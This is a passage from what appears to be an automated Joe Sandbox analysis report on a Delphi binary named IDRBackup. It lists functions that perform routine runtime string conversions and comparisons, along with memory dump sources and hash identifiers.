                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B918
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B940
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B953
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B967
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSystem@$System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Builder@set_Char$qqrx20Length$qqriMove$qqrpxvpviSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 509217649-0
                                                                                                  • Opcode ID: 57109080cef9c16d1e5caa8776740e072df40173a5d0d8d2589dbaaf05c1b2f2
                                                                                                  • Instruction ID: 4776b8aa2b7f85fb9c844d62bdb1f3a0b78aa5720451edc0d99c7a6c12b062e9
                                                                                                  • Opcode Fuzzy Hash: 57109080cef9c16d1e5caa8776740e072df40173a5d0d8d2589dbaaf05c1b2f2
                                                                                                  • Instruction Fuzzy Hash: AD218330B02186DF9F11EF78E95186DB3F9EF8430076142A6E64497215EB30EF41D780
                                                                                                  Function 5000A1E4 Relevance: 12.1, APIs: 8, Instructions: 79COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A202
                                                                                                    • Part of subcall function 50009D40: @System@@NewUnicodeString$qqri.RTL120(00000000,?,50004742), ref: 50009D5B
                                                                                                    • Part of subcall function 50009D40: @System@Move$qqrpxvpvi.RTL120(00000000,?,50004742), ref: 50009D69
                                                                                                    • Part of subcall function 50009D40: @System@@FreeMem$qqrpv.RTL120(50004742), ref: 50009D8B
                                                                                                  • @System@@NewUnicodeString$qqri.RTL120 ref: 5000A227
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A23B
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A253
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A263
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A279
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A287
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A297
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$Asg$qqrr20StringStringx20$Move$qqrpxvpvi$String$qqri$Clr$qqrpvFreeMem$qqrpv
                                                                                                  • String ID:
                                                                                                  • API String ID: 628645394-0
                                                                                                  • Opcode ID: 43e4a635c658f9d3ccd16e17d2eed1da22889dcf8d4b35ef7c0074040d58dafa
                                                                                                  • Instruction ID: a5e17d5f5a6bf6054f8e727ea2d10013107e8b22956fef989289cb67f68bf60a
                                                                                                  • Opcode Fuzzy Hash: 43e4a635c658f9d3ccd16e17d2eed1da22889dcf8d4b35ef7c0074040d58dafa
                                                                                                  • Instruction Fuzzy Hash: 3021B7307065A04BFB14AB5DD4B2A2EF3E69FD5100BE4872BA644CB306DA75CC41C392
                                                                                                  Function 50028754 Relevance: 12.1, APIs: 8, Instructions: 78COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 5002879B
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 500287C3
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287D7
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50028822), ref: 500287E0
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287F6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSystem@System@@Unicode$AnsiChar$qqrx20FromStr$qqrr20Stringx27System@%T$us$i0$%$Internal
                                                                                                  • String ID:
                                                                                                  • API String ID: 1771006815-0
                                                                                                  • Opcode ID: 776671bc0eec5f129ae3a97f8df4fb0cf3bb1fa82ad82360c3030aec5ea0138b
                                                                                                  • Instruction ID: dc23fba009a07f5ee1e34ee886edddc6a55f2f6ed9e61d9879787caccd6cdf4c
                                                                                                  • Opcode Fuzzy Hash: 776671bc0eec5f129ae3a97f8df4fb0cf3bb1fa82ad82360c3030aec5ea0138b
                                                                                                  • Instruction Fuzzy Hash: 7E219835A022969FDF01DFB8EC9195EB7F9EF54200FA14676E504A3255EB70EE41C780
                                                                                                  Function 50008CB0 Relevance: 12.1, APIs: 8, Instructions: 77COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120 ref: 50008CCE
                                                                                                    • Part of subcall function 500087FC: @System@@NewAnsiString$qqrius.RTL120(?,?,500056AE,00000000), ref: 50008821
                                                                                                    • Part of subcall function 500087FC: @System@Move$qqrpxvpvi.RTL120(00000000,?,500056AE,00000000), ref: 5000882D
                                                                                                    • Part of subcall function 500087FC: @System@@FreeMem$qqrpv.RTL120(500056AE,00000000), ref: 5000884F
                                                                                                  • @System@@NewAnsiString$qqrius.RTL120 ref: 50008CF2
                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120(00000000), ref: 50008D06
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000), ref: 50008D1C
                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120(00000000), ref: 50008D2C
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000), ref: 50008D3E
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 50008D4C
                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120 ref: 50008D5C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$Asg$qqrpvpxv$Move$qqrpxvpviSystem@$AnsiString$qqrius$Clr$qqrpvFreeMem$qqrpv
                                                                                                  • String ID:
                                                                                                  • API String ID: 2313995952-0
                                                                                                  • Opcode ID: 936d8e47756e1243cb644d74a7489a6b21377997ac42361d4549fc5c609b8712
                                                                                                  • Instruction ID: 904c7c465a019645a902773b85c2849f7ea8bb55d576d4d16d3aa3ff9e88d0e0
                                                                                                  • Opcode Fuzzy Hash: 936d8e47756e1243cb644d74a7489a6b21377997ac42361d4549fc5c609b8712
                                                                                                  • Instruction Fuzzy Hash: 2B2165247051908BB754E71DD47192DF3F6BFE42407E4872BA6C4C7269DAB0DC818795
                                                                                                  Function 50015614 Relevance: 12.1, APIs: 8, Instructions: 75COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500156E2), ref: 50015657
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500156E2), ref: 5001567F
                                                                                                  • @Sysutils@ByteType$qqrx20System@UnicodeStringi.RTL120(00000000,500156E2), ref: 5001569F
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,500156E2), ref: 500156AB
                                                                                                  • @Sysutils@AnsiStrIComp$qqrpbt1.RTL120(00000000,500156E2), ref: 500156B7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$AnsiStringSystem@@$FromStr$qqrr20Stringx27System@%T$us$i0$%$InternalSysutils@$ByteChar$qqrx20Comp$qqrpbt1StringiType$qqrx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 1446078087-0
                                                                                                  • Opcode ID: c5b83aefb23b3358bd06b18d679ca1007ac45f940c9c0406256258f96d7ac833
                                                                                                  • Instruction ID: beebbf29126e9d6e6507f71e1fa188fd936efd99e5be5d72eda28bad75657d21
                                                                                                  • Opcode Fuzzy Hash: c5b83aefb23b3358bd06b18d679ca1007ac45f940c9c0406256258f96d7ac833
                                                                                                  • Instruction Fuzzy Hash: 10215C30A0138ADFEF01DEB8DD9299DB7F5EF54201F904675A5409B265EB70DE85CA80
                                                                                                  Function 500158D8 Relevance: 12.1, APIs: 8, Instructions: 75COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500159A6), ref: 5001591B
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500159A6), ref: 50015943
                                                                                                  • @Sysutils@ByteType$qqrx20System@UnicodeStringi.RTL120(00000000,500159A6), ref: 50015963
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,500159A6), ref: 5001596F
                                                                                                  • @Sysutils@AnsiStrComp$qqrpbt1.RTL120(00000000,500159A6), ref: 5001597B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$AnsiStringSystem@@$FromStr$qqrr20Stringx27System@%T$us$i0$%$InternalSysutils@$ByteChar$qqrx20Comp$qqrpbt1StringiType$qqrx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 1446078087-0
                                                                                                  • Opcode ID: 967e1a292ced734fea3fda5a5ef9006a9914c61bdb3ab0efd8a449f196f86bfa
                                                                                                  • Instruction ID: 972cb8add0711401713003887be376873cbf6b1675d33c83f3af55f82446fe10
                                                                                                  • Opcode Fuzzy Hash: 967e1a292ced734fea3fda5a5ef9006a9914c61bdb3ab0efd8a449f196f86bfa
                                                                                                  • Instruction Fuzzy Hash: 87219D30A0028ADFDF01DFB9DD8169DB7F5EF45211F504276E6009B255EB30DE82D642
                                                                                                  Function 50015534 Relevance: 12.1, APIs: 8, Instructions: 74COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,500155FB), ref: 50015563
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500155FB), ref: 50015582
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500155FB), ref: 500155AA
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,500155FB), ref: 500155C4
                                                                                                  • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,00000000,500155FB), ref: 500155D3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: String$System@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20Internal$Compare
                                                                                                  • String ID:
                                                                                                  • API String ID: 1952152088-0
                                                                                                  • Opcode ID: 49bd338da330a834a7d5b6809eacd117c69c76319b46f620415589b967403da5
                                                                                                  • Instruction ID: 8a79f3fe02d8f7039cd64eb97ab1fc8fe1bf3bea09e212b9e8f8072deb91f6bc
                                                                                                  • Opcode Fuzzy Hash: 49bd338da330a834a7d5b6809eacd117c69c76319b46f620415589b967403da5
                                                                                                  • Instruction Fuzzy Hash: 45216F70610685EFEB11DEB8DDA299EB7FAEF44240F904662E600EB291E770DE81D650
                                                                                                  Function 5001A0A8 Relevance: 12.1, APIs: 8, Instructions: 73COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A0C8
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A0D2
                                                                                                    • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A0EF
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A117
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A12B
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A135
                                                                                                  • CompareStringW.KERNEL32(00000400,00000000,00000000,?,00000000,?,00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?), ref: 5001A142
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Char$qqrx20InternalStringx20$CompareFreeMem$qqrpv
                                                                                                  • String ID:
                                                                                                  • API String ID: 2845561448-0
                                                                                                  • Opcode ID: a637fd93928d4bcc59d4fbf31d7dd1fda35c7064787cfb8b0e7d3fb8d7a31359
                                                                                                  • Instruction ID: 557e5c510faaf08c59fda0598d3fc89e05443d392f4ccd520a77b62b8c30d619
                                                                                                  • Opcode Fuzzy Hash: a637fd93928d4bcc59d4fbf31d7dd1fda35c7064787cfb8b0e7d3fb8d7a31359
                                                                                                  • Instruction Fuzzy Hash: 2F219331B003A5ABEF11DAB4DC52A5AB7F8EF49200F514272EA00E7246E770EE85C690
                                                                                                  Function 5001A248 Relevance: 12.1, APIs: 8, Instructions: 73COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A268
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A272
                                                                                                    • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A28F
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A2B7
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A2CB
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A2D5
                                                                                                  • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A2E2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Char$qqrx20InternalStringx20$CompareFreeMem$qqrpv
                                                                                                  • String ID:
                                                                                                  • API String ID: 2845561448-0
                                                                                                  • Opcode ID: e7b34f49780f89b28d14b2ecf1d82b6ca6848bd6e1332e36c68cebb614f42406
                                                                                                  • Instruction ID: 839b017c909a13abe63715c34b3dec019e8b2fcbb166aed1b6d102ad71667342
                                                                                                  • Opcode Fuzzy Hash: e7b34f49780f89b28d14b2ecf1d82b6ca6848bd6e1332e36c68cebb614f42406
                                                                                                  • Instruction Fuzzy Hash: 7B219331A003A5ABEF01DAB8DD91A5AB7F8EF49600F514272FA00E7245E670DE85C690
                                                                                                  Function 5001A17C Relevance: 12.1, APIs: 8, Instructions: 69COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A238), ref: 5001A1C0
